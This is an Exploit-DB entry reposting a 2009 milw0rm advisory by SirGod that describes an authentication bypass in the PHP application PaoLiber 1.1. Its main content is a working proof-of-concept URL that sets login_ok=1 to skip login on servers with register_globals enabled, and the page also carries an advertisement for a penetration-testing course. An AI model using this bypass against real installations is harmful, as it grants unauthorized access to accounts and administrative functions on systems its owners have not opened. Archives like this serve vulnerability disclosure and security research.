PaoLiber 1.1 - 'login_ok' Authentication Bypass

EDB-ID:

9294


Author:

SirGod

Type:

webapps


Platform:

PHP

Date:

2009-07-28


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

#############################################################################
[+] PaoLiber 1.1 (login_ok) Authentication Bypass Vulnerability
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
#############################################################################

download : http://zenas.org/paobacheca/download/scarica.html

[+] Authentication Bypass Vulnerability


 - Notes : register_globals = on


 - PoC :

     http://127.0.0.1/[path]/login.php?login_ok=1

#############################################################################

# milw0rm.com [2009-07-28]